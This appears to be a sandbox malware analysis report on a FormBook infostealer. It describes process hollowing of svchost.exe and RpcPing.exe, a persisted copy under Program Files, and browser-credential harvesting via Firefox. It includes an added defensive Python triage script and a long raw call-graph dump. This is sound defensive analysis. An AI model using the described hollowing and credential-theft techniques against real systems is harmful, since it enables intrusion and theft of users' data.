                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true
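The process table above is the part of the report an analyst reads first: the dropper (Target 0) starts a 32-bit svchost.exe (Target 2) whose recorded command line is still the dropper's own path, the FormBook payload is then found in memory of the persisted copy under Program Files (x86) (Targets 3 and 8) and of a hollowed RpcPing.exe (Target 5), and Firefox (Target 10) is launched for the browser-credential harvesting listed in the signatures. The script below is an added example, not part of the Joe Sandbox report or its tooling; it automates the two checks that reading makes by eye. The records are constructed from Target IDs 0, 2, 3, 5, 8 and 10 of this report; the field names and the reading of the .sdmp name fields (first field = Target ID, fourth = region base address, fifth = Windows page protection) are this example's own assumptions.

```python
"""Added example (not from the Joe Sandbox report): triage a sandbox process
table for hollowing-style image/argv[0] mismatches and in-memory Yara hits.

Records are constructed from the process table of this report. Field names
and the decoding of .sdmp names are this example's assumptions."""
import ntpath
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40   # Windows memory protection constant


@dataclass(frozen=True)
class ProcessRecord:
    target_id: int
    path: str                # image the process was created from (report: Path)
    commandline: str         # command line as recorded (report: Commandline)
    yara_dumps: tuple = ()   # distinct .sdmp names with FormBook Yara hits


PROCESSES = [
    ProcessRecord(0, r"C:\Users\user\Desktop\N2Qncau2rN.exe",
                  r'"C:\Users\user\Desktop\N2Qncau2rN.exe"'),
    ProcessRecord(2, r"C:\Windows\SysWOW64\svchost.exe",
                  r'"C:\Users\user\Desktop\N2Qncau2rN.exe"',
                  ("00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp",
                   "00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp",
                   "00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp")),
    ProcessRecord(3, r"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe",
                  r'"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"',
                  ("00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp",)),
    ProcessRecord(5, r"C:\Windows\SysWOW64\RpcPing.exe",
                  r'"C:\Windows\SysWOW64\RpcPing.exe"',
                  ("00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp",
                   "00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp",
                   "00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp")),
    ProcessRecord(8, r"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe",
                  r'"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"',
                  ("00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp",)),
    ProcessRecord(10, r"C:\Program Files\Mozilla Firefox\firefox.exe",
                  r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
]


def commandline_image(cmdline):
    """Return argv[0] of a Windows command line, quoted or bare form."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def image_mismatch(rec):
    """True when argv[0] names a different executable than the process image.

    Compared case-insensitively: Firefox.exe vs firefox.exe (Target 10) is a
    spelling difference, svchost.exe carrying N2Qncau2rN.exe (Target 2) is the
    signature of a process created suspended and overwritten (hollowing)."""
    argv0 = ntpath.basename(commandline_image(rec.commandline))
    return argv0.lower() != ntpath.basename(rec.path).lower()


def parse_dump_name(name):
    """Split a .sdmp name into (target_id, base_address, protection).

    Assumption (this example's reading, not documented on the page): field 1
    is the decimal Target ID, field 4 the region base address and field 5 a
    Windows page protection (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE)."""
    parts = name.split(".")
    return int(parts[0]), int(parts[3], 16), int(parts[4], 16)


def triage(processes):
    """Return {target_id: [reasons]} for every process worth a closer look."""
    findings = {}
    for p in processes:
        reasons = []
        if image_mismatch(p):
            reasons.append(f"argv[0] {commandline_image(p.commandline)!r} != image {p.path!r}")
        for dump in p.yara_dumps:
            tid, base, prot = parse_dump_name(dump)
            if tid != p.target_id:
                continue  # hit recorded against another process' dump
            rwx = " RWX" if prot == PAGE_EXECUTE_READWRITE else ""
            reasons.append(f"FormBook Yara hit in{rwx} region at 0x{base:X}")
        if reasons:
            findings[p.target_id] = reasons
    return findings


if __name__ == "__main__":
    for tid, reasons in sorted(triage(PROCESSES).items()):
        print(f"Target {tid}:")
        for r in reasons:
            print("  -", r)
```

Run as-is it flags Targets 2, 3, 5 and 8 and leaves 0 and 10 alone; the RWX annotation separates the unpacked code regions (protection 0x40) from the 0x04 heap regions in RpcPing.exe, which is where one would expect configuration or harvested data rather than code.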


                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                Signature Coverage:8.8%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:37
execution_graph: interactive call-graph widget in the original report; its node and edge list is omitted here. The rendered portion covers code inside the 0x400000 image of Target 0, starting at 0x4010e0 and centred on a message-handling routine at 0x401100 that reaches DefWindowProcW, Shell_NotifyIconW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, DestroyIcon and LoadStringW, plus CRT and runtime helpers (_malloc, _memmove, _wcscpy, _wcsncpy, __call_reportfault, std::exception, RtlAllocateHeap, RaiseException, GetModuleHandleW / GetProcAddress / ExitProcess via ___crtCorExitProcess, VariantClear).
86340->86341 86341->86334 86342 425ba2 86347 40e360 86342->86347 86344 425bb4 86363 41130a 51 API calls __cinit 86344->86363 86346 425bbe 86348 4115d7 52 API calls 86347->86348 86349 40e3ec GetModuleFileNameW 86348->86349 86364 413a0e 86349->86364 86351 40e421 _wcsncat 86367 413a9e 86351->86367 86354 4115d7 52 API calls 86355 40e45e _wcscpy 86354->86355 86370 40bc70 86355->86370 86359 40e4a9 86359->86344 86360 40e4a1 _wcscat _wcslen _wcsncpy 86360->86359 86361 4115d7 52 API calls 86360->86361 86362 401c90 52 API calls 86360->86362 86361->86360 86362->86360 86363->86346 86389 413801 86364->86389 86419 419efd 86367->86419 86371 4115d7 52 API calls 86370->86371 86372 40bc98 86371->86372 86373 4115d7 52 API calls 86372->86373 86374 40bca6 86373->86374 86375 40e4c0 86374->86375 86431 403350 86375->86431 86377 40e4cb RegOpenKeyExW 86378 427190 RegQueryValueExW 86377->86378 86379 40e4eb 86377->86379 86380 4271b0 86378->86380 86381 42721a RegCloseKey 86378->86381 86379->86360 86382 4115d7 52 API calls 86380->86382 86381->86360 86383 4271cb 86382->86383 86438 43652f 52 API calls 86383->86438 86385 4271d8 RegQueryValueExW 86386 4271f7 86385->86386 86388 42720e 86385->86388 86387 402160 52 API calls 86386->86387 86387->86388 86388->86381 86390 41389e 86389->86390 86394 41381a 86389->86394 86391 4139e8 86390->86391 86393 413a00 86390->86393 86416 417f77 46 API calls __getptd_noexit 86391->86416 86418 417f77 46 API calls __getptd_noexit 86393->86418 86394->86390 86404 41388a 86394->86404 86411 419e30 46 API calls __wsplitpath_helper 86394->86411 86395 4139ed 86417 417f25 10 API calls __wsplitpath_helper 86395->86417 86399 41396c 86399->86390 86400 413967 86399->86400 86402 41397a 86399->86402 86400->86351 86401 413929 86401->86390 86403 413945 86401->86403 86413 419e30 46 API calls __wsplitpath_helper 86401->86413 86415 419e30 46 API calls __wsplitpath_helper 86402->86415 86403->86390 86403->86400 86407 41395b 86403->86407 86404->86390 86410 413909 86404->86410 86412 419e30 46 
API calls __wsplitpath_helper 86404->86412 86414 419e30 46 API calls __wsplitpath_helper 86407->86414 86410->86399 86410->86401 86411->86404 86412->86410 86413->86403 86414->86400 86415->86400 86416->86395 86417->86400 86418->86400 86420 419f13 86419->86420 86421 419f0e 86419->86421 86428 417f77 46 API calls __getptd_noexit 86420->86428 86421->86420 86427 419f2b 86421->86427 86425 40e454 86425->86354 86426 419f18 86429 417f25 10 API calls __wsplitpath_helper 86426->86429 86427->86425 86430 417f77 46 API calls __getptd_noexit 86427->86430 86428->86426 86429->86425 86430->86426 86432 403367 86431->86432 86433 403358 86431->86433 86434 4115d7 52 API calls 86432->86434 86433->86377 86435 403370 86434->86435 86436 4115d7 52 API calls 86435->86436 86437 40339e 86436->86437 86437->86377 86438->86385 86439 416454 86476 416c70 86439->86476 86441 416460 GetStartupInfoW 86442 416474 86441->86442 86477 419d5a HeapCreate 86442->86477 86444 4164cd 86445 4164d8 86444->86445 86561 41642b 46 API calls 3 library calls 86444->86561 86478 417c20 GetModuleHandleW 86445->86478 86448 4164de 86450 4164e9 __RTC_Initialize 86448->86450 86562 41642b 46 API calls 3 library calls 86448->86562 86497 41aaa1 GetStartupInfoW 86450->86497 86453 416503 GetCommandLineW 86510 41f584 GetEnvironmentStringsW 86453->86510 86457 416513 86516 41f4d6 GetModuleFileNameW 86457->86516 86459 41651d 86460 416528 86459->86460 86564 411924 46 API calls 3 library calls 86459->86564 86520 41f2a4 86460->86520 86463 41652e 86464 416539 86463->86464 86565 411924 46 API calls 3 library calls 86463->86565 86534 411703 86464->86534 86467 416541 86469 41654c __wwincmdln 86467->86469 86566 411924 46 API calls 3 library calls 86467->86566 86538 40d6b0 86469->86538 86472 41657c 86568 411906 46 API calls _doexit 86472->86568 86475 416581 __write 86476->86441 86477->86444 86479 417c34 86478->86479 86480 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86478->86480 86569 4178ff 49 API calls _free 86479->86569 
86482 417c87 TlsAlloc 86480->86482 86485 417cd5 TlsSetValue 86482->86485 86486 417d96 86482->86486 86483 417c39 86483->86448 86485->86486 86487 417ce6 __init_pointers 86485->86487 86486->86448 86570 418151 InitializeCriticalSectionAndSpinCount 86487->86570 86489 417d91 86578 4178ff 49 API calls _free 86489->86578 86491 417d2a 86491->86489 86571 416b49 86491->86571 86494 417d76 86577 41793c 46 API calls 4 library calls 86494->86577 86496 417d7e GetCurrentThreadId 86496->86486 86498 416b49 __calloc_crt 46 API calls 86497->86498 86500 41aabf 86498->86500 86499 4164f7 86499->86453 86563 411924 46 API calls 3 library calls 86499->86563 86500->86499 86501 41ac34 86500->86501 86504 416b49 __calloc_crt 46 API calls 86500->86504 86506 41abb4 86500->86506 86502 41ac6a GetStdHandle 86501->86502 86503 41acce SetHandleCount 86501->86503 86505 41ac7c GetFileType 86501->86505 86509 41aca2 InitializeCriticalSectionAndSpinCount 86501->86509 86502->86501 86503->86499 86504->86500 86505->86501 86506->86501 86507 41abe0 GetFileType 86506->86507 86508 41abeb InitializeCriticalSectionAndSpinCount 86506->86508 86507->86506 86507->86508 86508->86499 86508->86506 86509->86499 86509->86501 86511 41f595 86510->86511 86512 41f599 86510->86512 86511->86457 86588 416b04 86512->86588 86514 41f5bb _memmove 86515 41f5c2 FreeEnvironmentStringsW 86514->86515 86515->86457 86517 41f50b _wparse_cmdline 86516->86517 86518 416b04 __malloc_crt 46 API calls 86517->86518 86519 41f54e _wparse_cmdline 86517->86519 86518->86519 86519->86459 86521 41f2bc _wcslen 86520->86521 86525 41f2b4 86520->86525 86522 416b49 __calloc_crt 46 API calls 86521->86522 86527 41f2e0 _wcslen 86522->86527 86523 41f336 86595 413748 86523->86595 86525->86463 86526 416b49 __calloc_crt 46 API calls 86526->86527 86527->86523 86527->86525 86527->86526 86528 41f35c 86527->86528 86531 41f373 86527->86531 86594 41ef12 46 API calls __wsplitpath_helper 86527->86594 86529 413748 _free 46 API calls 86528->86529 86529->86525 86601 417ed3 
86531->86601 86533 41f37f 86533->86463 86535 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86534->86535 86537 411750 __IsNonwritableInCurrentImage 86535->86537 86620 41130a 51 API calls __cinit 86535->86620 86537->86467 86539 42e2f3 86538->86539 86540 40d6cc 86538->86540 86621 408f40 86540->86621 86542 40d707 86625 40ebb0 86542->86625 86545 40d737 86628 411951 86545->86628 86550 40d751 86640 40f4e0 SystemParametersInfoW SystemParametersInfoW 86550->86640 86552 40d75f 86641 40d590 GetCurrentDirectoryW 86552->86641 86554 40d767 SystemParametersInfoW 86555 40d794 86554->86555 86556 40d78d FreeLibrary 86554->86556 86557 408f40 VariantClear 86555->86557 86556->86555 86558 40d79d 86557->86558 86559 408f40 VariantClear 86558->86559 86560 40d7a6 86559->86560 86560->86472 86567 4118da 46 API calls _doexit 86560->86567 86561->86445 86562->86450 86567->86472 86568->86475 86569->86483 86570->86491 86573 416b52 86571->86573 86574 416b8f 86573->86574 86575 416b70 Sleep 86573->86575 86579 41f677 86573->86579 86574->86489 86574->86494 86576 416b85 86575->86576 86576->86573 86576->86574 86577->86496 86578->86486 86580 41f683 86579->86580 86583 41f69e _malloc 86579->86583 86581 41f68f 86580->86581 86580->86583 86587 417f77 46 API calls __getptd_noexit 86581->86587 86582 41f6b1 HeapAlloc 86582->86583 86586 41f6d8 86582->86586 86583->86582 86583->86586 86585 41f694 86585->86573 86586->86573 86587->86585 86591 416b0d 86588->86591 86589 4135bb _malloc 45 API calls 86589->86591 86590 416b43 86590->86514 86591->86589 86591->86590 86592 416b24 Sleep 86591->86592 86593 416b39 86592->86593 86593->86590 86593->86591 86594->86527 86596 41377c _free 86595->86596 86597 413753 RtlFreeHeap 86595->86597 86596->86525 86597->86596 86598 413768 86597->86598 86604 417f77 46 API calls __getptd_noexit 86598->86604 86600 41376e GetLastError 86600->86596 86605 417daa 86601->86605 86604->86600 86606 417dc9 __call_reportfault 86605->86606 86607 417de7 IsDebuggerPresent 
SetUnhandledExceptionFilter UnhandledExceptionFilter 86606->86607 86610 417eb5 __call_reportfault 86607->86610 86609 417ed1 GetCurrentProcess TerminateProcess 86609->86533 86611 41a208 86610->86611 86612 41a210 86611->86612 86613 41a212 IsDebuggerPresent 86611->86613 86612->86609 86619 41fe19 86613->86619 86616 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86617 421ff0 __call_reportfault 86616->86617 86618 421ff8 GetCurrentProcess TerminateProcess 86616->86618 86617->86618 86618->86609 86619->86616 86620->86537 86623 408f48 moneypunct 86621->86623 86622 4265c7 VariantClear 86624 408f55 moneypunct 86622->86624 86623->86622 86623->86624 86624->86542 86681 40ebd0 86625->86681 86685 4182cb 86628->86685 86630 41195e 86692 4181f2 LeaveCriticalSection 86630->86692 86632 40d748 86633 4119b0 86632->86633 86634 4119d6 86633->86634 86635 4119bc 86633->86635 86634->86550 86635->86634 86727 417f77 46 API calls __getptd_noexit 86635->86727 86637 4119c6 86728 417f25 10 API calls __wsplitpath_helper 86637->86728 86639 4119d1 86639->86550 86640->86552 86729 401f20 86641->86729 86643 40d5b6 IsDebuggerPresent 86644 40d5c4 86643->86644 86645 42e1bb MessageBoxA 86643->86645 86646 42e1d4 86644->86646 86647 40d5e3 86644->86647 86645->86646 86901 403a50 52 API calls 3 library calls 86646->86901 86799 40f520 86647->86799 86651 40d5fd GetFullPathNameW 86811 401460 86651->86811 86653 40d63b 86655 40d643 86653->86655 86656 42e231 SetCurrentDirectoryW 86653->86656 86654 40d64c 86826 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86654->86826 86655->86654 86902 432fee 6 API calls 86655->86902 86656->86655 86660 42e252 86660->86654 86661 42e25a GetModuleFileNameW 86660->86661 86663 42e274 86661->86663 86664 42e2cb GetForegroundWindow ShellExecuteW 86661->86664 86903 401b10 86663->86903 86668 40d688 86664->86668 86665 40d656 86667 40d669 86665->86667 86670 40e0c0 74 API calls 86665->86670 86834 4091e0 86667->86834 86674 40d692 SetCurrentDirectoryW 86668->86674 
86670->86667 86674->86554 86675 42e28d 86910 40d200 52 API calls 2 library calls 86675->86910 86678 42e299 GetForegroundWindow ShellExecuteW 86679 42e2c6 86678->86679 86679->86668 86680 40ec00 LoadLibraryA GetProcAddress 86680->86545 86682 40d72e 86681->86682 86683 40ebd6 LoadLibraryA 86681->86683 86682->86545 86682->86680 86683->86682 86684 40ebe7 GetProcAddress 86683->86684 86684->86682 86686 4182e0 86685->86686 86687 4182f3 EnterCriticalSection 86685->86687 86693 418209 86686->86693 86687->86630 86689 4182e6 86689->86687 86720 411924 46 API calls 3 library calls 86689->86720 86692->86632 86694 418215 __write 86693->86694 86695 418225 86694->86695 86696 41823d 86694->86696 86721 418901 46 API calls 2 library calls 86695->86721 86699 416b04 __malloc_crt 45 API calls 86696->86699 86704 41824b __write 86696->86704 86698 41822a 86722 418752 46 API calls 8 library calls 86698->86722 86700 418256 86699->86700 86702 41825d 86700->86702 86703 41826c 86700->86703 86724 417f77 46 API calls __getptd_noexit 86702->86724 86707 4182cb __lock 45 API calls 86703->86707 86704->86689 86705 418231 86723 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86705->86723 86709 418273 86707->86709 86711 4182a6 86709->86711 86712 41827b InitializeCriticalSectionAndSpinCount 86709->86712 86715 413748 _free 45 API calls 86711->86715 86713 418297 86712->86713 86714 41828b 86712->86714 86726 4182c2 LeaveCriticalSection _doexit 86713->86726 86716 413748 _free 45 API calls 86714->86716 86715->86713 86718 418291 86716->86718 86725 417f77 46 API calls __getptd_noexit 86718->86725 86721->86698 86722->86705 86724->86704 86725->86713 86726->86704 86727->86637 86728->86639 86911 40e6e0 86729->86911 86733 401f41 GetModuleFileNameW 86929 410100 86733->86929 86735 401f5c 86941 410960 86735->86941 86738 401b10 52 API calls 86739 401f81 86738->86739 86944 401980 86739->86944 86741 401f8e 86742 408f40 VariantClear 86741->86742 86743 401f9d 86742->86743 86744 401b10 52 API calls 
86743->86744 86745 401fb4 86744->86745 86746 401980 53 API calls 86745->86746 86747 401fc3 86746->86747 86748 401b10 52 API calls 86747->86748 86749 401fd2 86748->86749 86952 40c2c0 86749->86952 86751 401fe1 86752 40bc70 52 API calls 86751->86752 86753 401ff3 86752->86753 86970 401a10 86753->86970 86755 401ffe 86977 4114ab 86755->86977 86758 428b05 86760 401a10 52 API calls 86758->86760 86759 402017 86761 4114ab __wcsicoll 58 API calls 86759->86761 86762 428b18 86760->86762 86763 402022 86761->86763 86765 401a10 52 API calls 86762->86765 86763->86762 86764 40202d 86763->86764 86766 4114ab __wcsicoll 58 API calls 86764->86766 86767 428b33 86765->86767 86768 402038 86766->86768 86770 428b3b GetModuleFileNameW 86767->86770 86769 402043 86768->86769 86768->86770 86771 4114ab __wcsicoll 58 API calls 86769->86771 86772 401a10 52 API calls 86770->86772 86773 40204e 86771->86773 86774 428b6c 86772->86774 86775 402092 86773->86775 86780 401a10 52 API calls 86773->86780 86783 428b90 _wcscpy 86773->86783 86776 40e0a0 52 API calls 86774->86776 86777 4020a3 86775->86777 86775->86783 86778 428b7a 86776->86778 86779 428bc6 86777->86779 86985 40e830 53 API calls 86777->86985 86781 401a10 52 API calls 86778->86781 86785 402073 _wcscpy 86780->86785 86782 428b88 86781->86782 86782->86783 86786 401a10 52 API calls 86783->86786 86789 401a10 52 API calls 86785->86789 86794 4020d0 86786->86794 86787 4020bb 86986 40cf00 53 API calls 86787->86986 86789->86775 86790 4020c6 86791 408f40 VariantClear 86790->86791 86791->86794 86792 402110 86796 408f40 VariantClear 86792->86796 86794->86792 86797 401a10 52 API calls 86794->86797 86987 40cf00 53 API calls 86794->86987 86988 40e6a0 53 API calls 86794->86988 86798 402120 moneypunct 86796->86798 86797->86794 86798->86643 86800 4295c9 __call_reportfault 86799->86800 86801 40f53c 86799->86801 86804 4295d9 GetOpenFileNameW 86800->86804 87667 410120 86801->87667 86803 40f545 87671 4102b0 SHGetMalloc 86803->87671 86804->86801 86806 40d5f5 86804->86806 
86806->86651 86806->86653 86807 40f54c 87676 410190 GetFullPathNameW 86807->87676 86809 40f559 87687 40f570 86809->87687 87743 402400 86811->87743 86813 40146f 86814 428c29 _wcscat 86813->86814 87752 401500 86813->87752 86816 40147c 86816->86814 87760 40d440 86816->87760 86818 401489 86818->86814 86819 401491 GetFullPathNameW 86818->86819 86820 402160 52 API calls 86819->86820 86821 4014bb 86820->86821 86822 402160 52 API calls 86821->86822 86823 4014c8 86822->86823 86823->86814 86824 402160 52 API calls 86823->86824 86825 4014ee 86824->86825 86825->86653 86827 428361 86826->86827 86828 4103fc LoadImageW RegisterClassExW 86826->86828 87780 44395e EnumResourceNamesW LoadImageW 86827->87780 87779 410490 7 API calls 86828->87779 86831 40d651 86833 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86831->86833 86832 428368 86833->86665 86835 409202 86834->86835 86836 42d7ad 86834->86836 86893 409216 moneypunct 86835->86893 88043 410940 331 API calls 86835->88043 88046 45e737 90 API calls 3 library calls 86836->88046 86839 409386 86840 40939c 86839->86840 88044 40f190 10 API calls 86839->88044 86840->86668 86900 401000 Shell_NotifyIconW __call_reportfault 86840->86900 86842 4095b2 86842->86840 86844 4095bf 86842->86844 86843 409253 PeekMessageW 86843->86893 88045 401a50 331 API calls 86844->88045 86846 40d410 VariantClear 86846->86893 86847 42d8cd Sleep 86847->86893 86848 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86848->86840 86851 4095f9 86848->86851 86850 42e13b 88064 40d410 VariantClear 86850->88064 86854 42e158 TranslateMessage DispatchMessageW GetMessageW 86851->86854 86854->86854 86857 42e188 86854->86857 86856 409567 PeekMessageW 86856->86893 86857->86840 86859 44c29d 52 API calls 86899 4094e0 86859->86899 86860 46f3c1 107 API calls 86860->86893 86861 40e0a0 52 API calls 86861->86893 86862 46fdbf 108 API calls 86862->86899 86863 42dcd2 WaitForSingleObject 86868 42dcf0 GetExitCodeProcess CloseHandle 86863->86868 86863->86893 86864 409551 
TranslateMessage DispatchMessageW 86864->86856 86866 42dd3d Sleep 86866->86899 86867 47d33e 309 API calls 86867->86893 88053 40d410 VariantClear 86868->88053 86871 4094cf Sleep 86871->86899 86872 40c620 timeGetTime 86872->86899 86875 42d94d timeGetTime 88049 465124 53 API calls 86875->88049 86879 465124 53 API calls 86879->86899 86880 42dd89 CloseHandle 86880->86899 86881 408f40 VariantClear 86881->86899 86883 42de19 GetExitCodeProcess CloseHandle 86883->86899 86886 42de88 Sleep 86886->86893 86889 45e737 90 API calls 86889->86893 86892 42e0cc VariantClear 86892->86893 86893->86839 86893->86843 86893->86846 86893->86847 86893->86850 86893->86856 86893->86860 86893->86861 86893->86863 86893->86864 86893->86866 86893->86867 86893->86871 86893->86875 86893->86889 86893->86892 86895 408f40 VariantClear 86893->86895 86893->86899 87781 4091b0 86893->87781 87839 40afa0 86893->87839 87865 408fc0 86893->87865 87900 408cc0 86893->87900 87914 4096a0 86893->87914 88041 40d150 TranslateAcceleratorW 86893->88041 88042 40d170 IsDialogMessageW GetClassLongW 86893->88042 88047 465124 53 API calls 86893->88047 88048 40c620 timeGetTime 86893->88048 88063 40e270 VariantClear moneypunct 86893->88063 86894 401b10 52 API calls 86894->86899 86895->86893 86897 401980 53 API calls 86897->86899 86899->86859 86899->86862 86899->86872 86899->86879 86899->86880 86899->86881 86899->86883 86899->86886 86899->86893 86899->86894 86899->86897 88050 45178a 54 API calls 86899->88050 88051 47d33e 331 API calls 86899->88051 88052 453bc6 54 API calls 86899->88052 88054 40d410 VariantClear 86899->88054 88055 443d19 67 API calls _wcslen 86899->88055 88056 4574b4 VariantClear 86899->88056 88057 403cd0 86899->88057 88061 4731e1 VariantClear 86899->88061 88062 4331a2 6 API calls 86899->88062 86900->86668 86901->86653 86902->86660 86904 401b16 _wcslen 86903->86904 86905 4115d7 52 API calls 86904->86905 86907 401b63 86904->86907 86906 401b4b _memmove 86905->86906 86908 4115d7 52 API calls 86906->86908 86909 
40d200 52 API calls 2 library calls 86907->86909 86908->86907 86909->86675 86910->86678 86912 40bc70 52 API calls 86911->86912 86913 401f31 86912->86913 86914 402560 86913->86914 86915 40256d __write_nolock 86914->86915 86916 402160 52 API calls 86915->86916 86918 402593 86916->86918 86920 4025bd 86918->86920 86989 401c90 86918->86989 86919 4026f0 52 API calls 86919->86920 86920->86919 86922 4026a7 86920->86922 86924 401b10 52 API calls 86920->86924 86926 401c90 52 API calls 86920->86926 86992 40d7c0 52 API calls 2 library calls 86920->86992 86921 4026db 86921->86733 86922->86921 86923 401b10 52 API calls 86922->86923 86925 4026d1 86923->86925 86924->86920 86993 40d7c0 52 API calls 2 library calls 86925->86993 86926->86920 86994 40f760 86929->86994 86932 410118 86932->86735 86934 42805d 86935 42806a 86934->86935 87050 431e58 86934->87050 86937 413748 _free 46 API calls 86935->86937 86938 428078 86937->86938 86939 431e58 82 API calls 86938->86939 86940 428084 86939->86940 86940->86735 86942 4115d7 52 API calls 86941->86942 86943 401f74 86942->86943 86943->86738 86945 4019a3 86944->86945 86946 401985 86944->86946 86945->86946 86947 4019b8 86945->86947 86949 40199f 86946->86949 87655 403e10 53 API calls 86946->87655 87656 403e10 53 API calls 86947->87656 86949->86741 86950 4019c4 86950->86741 86953 40c2c7 86952->86953 86954 40c30e 86952->86954 86957 40c2d3 86953->86957 86958 426c79 86953->86958 86955 40c315 86954->86955 86956 426c2b 86954->86956 86959 40c321 86955->86959 86960 426c5a 86955->86960 86962 426c4b 86956->86962 86963 426c2e 86956->86963 87657 403ea0 52 API calls __cinit 86957->87657 87662 4534e3 52 API calls 86958->87662 87658 403ea0 52 API calls __cinit 86959->87658 87661 4534e3 52 API calls 86960->87661 87660 4534e3 52 API calls 86962->87660 86966 40c2de 86963->86966 87659 4534e3 52 API calls 86963->87659 86966->86751 86971 401a30 86970->86971 86972 401a17 86970->86972 86974 402160 52 API calls 86971->86974 86973 401a2d 86972->86973 87663 403c30 52 API 
calls _memmove 86972->87663 86973->86755 86976 401a3d 86974->86976 86976->86755 86978 411523 86977->86978 86979 4114ba 86977->86979 87666 4113a8 58 API calls 3 library calls 86978->87666 86984 40200c 86979->86984 87664 417f77 46 API calls __getptd_noexit 86979->87664 86982 4114c6 87665 417f25 10 API calls __wsplitpath_helper 86982->87665 86984->86758 86984->86759 86985->86787 86986->86790 86987->86794 86988->86794 86990 4026f0 52 API calls 86989->86990 86991 401c97 86990->86991 86991->86918 86992->86920 86993->86921 87054 40f6f0 86994->87054 86996 40f77b _strcat moneypunct 87062 40f850 86996->87062 87002 40f7fc 87003 427c2a 87002->87003 87005 40f804 87002->87005 87091 414d04 87003->87091 87078 414a46 87005->87078 87009 40f80e 87009->86932 87013 4528bd 87009->87013 87010 427c59 87097 414fe2 87010->87097 87012 427c79 87014 4150d1 _fseek 81 API calls 87013->87014 87015 452930 87014->87015 87597 452719 87015->87597 87018 452948 87018->86934 87019 414d04 __fread_nolock 61 API calls 87020 452966 87019->87020 87021 414d04 __fread_nolock 61 API calls 87020->87021 87022 452976 87021->87022 87023 414d04 __fread_nolock 61 API calls 87022->87023 87024 45298f 87023->87024 87025 414d04 __fread_nolock 61 API calls 87024->87025 87026 4529aa 87025->87026 87027 4150d1 _fseek 81 API calls 87026->87027 87028 4529c4 87027->87028 87029 4135bb _malloc 46 API calls 87028->87029 87030 4529cf 87029->87030 87031 4135bb _malloc 46 API calls 87030->87031 87032 4529db 87031->87032 87033 414d04 __fread_nolock 61 API calls 87032->87033 87034 4529ec 87033->87034 87035 44afef GetSystemTimeAsFileTime 87034->87035 87036 452a00 87035->87036 87037 452a36 87036->87037 87038 452a13 87036->87038 87040 452aa5 87037->87040 87041 452a3c 87037->87041 87039 413748 _free 46 API calls 87038->87039 87043 452a1c 87039->87043 87042 413748 _free 46 API calls 87040->87042 87603 44b1a9 87041->87603 87045 452aa3 87042->87045 87046 413748 _free 46 API calls 87043->87046 87045->86934 87048 452a25 87046->87048 87047 
452a9d 87049 413748 _free 46 API calls 87047->87049 87048->86934 87049->87045 87051 431e64 87050->87051 87052 431e6a 87050->87052 87053 414a46 __fcloseall 82 API calls 87051->87053 87052->86935 87053->87052 87055 425de2 87054->87055 87056 40f6fc _wcslen 87054->87056 87055->86996 87057 40f710 WideCharToMultiByte 87056->87057 87058 40f756 87057->87058 87059 40f728 87057->87059 87058->86996 87060 4115d7 52 API calls 87059->87060 87061 40f735 WideCharToMultiByte 87060->87061 87061->86996 87064 40f85d __call_reportfault _strlen 87062->87064 87065 40f7ab 87064->87065 87110 414db8 87064->87110 87066 4149c2 87065->87066 87125 414904 87066->87125 87068 40f7e9 87068->87003 87069 40f5c0 87068->87069 87073 40f5cd _strcat __write_nolock _memmove 87069->87073 87070 414d04 __fread_nolock 61 API calls 87070->87073 87072 425d11 87074 4150d1 _fseek 81 API calls 87072->87074 87073->87070 87073->87072 87077 40f691 __tzset_nolock 87073->87077 87213 4150d1 87073->87213 87075 425d33 87074->87075 87076 414d04 __fread_nolock 61 API calls 87075->87076 87076->87077 87077->87002 87079 414a52 __write 87078->87079 87080 414a64 87079->87080 87081 414a79 87079->87081 87353 417f77 46 API calls __getptd_noexit 87080->87353 87083 415471 __lock_file 47 API calls 87081->87083 87089 414a74 __write 87081->87089 87085 414a92 87083->87085 87084 414a69 87354 417f25 10 API calls __wsplitpath_helper 87084->87354 87337 4149d9 87085->87337 87089->87009 87422 414c76 87091->87422 87093 414d1c 87094 44afef 87093->87094 87590 442c5a 87094->87590 87096 44b00d 87096->87010 87098 414fee __write 87097->87098 87099 414ffa 87098->87099 87100 41500f 87098->87100 87594 417f77 46 API calls __getptd_noexit 87099->87594 87102 415471 __lock_file 47 API calls 87100->87102 87104 415017 87102->87104 87103 414fff 87595 417f25 10 API calls 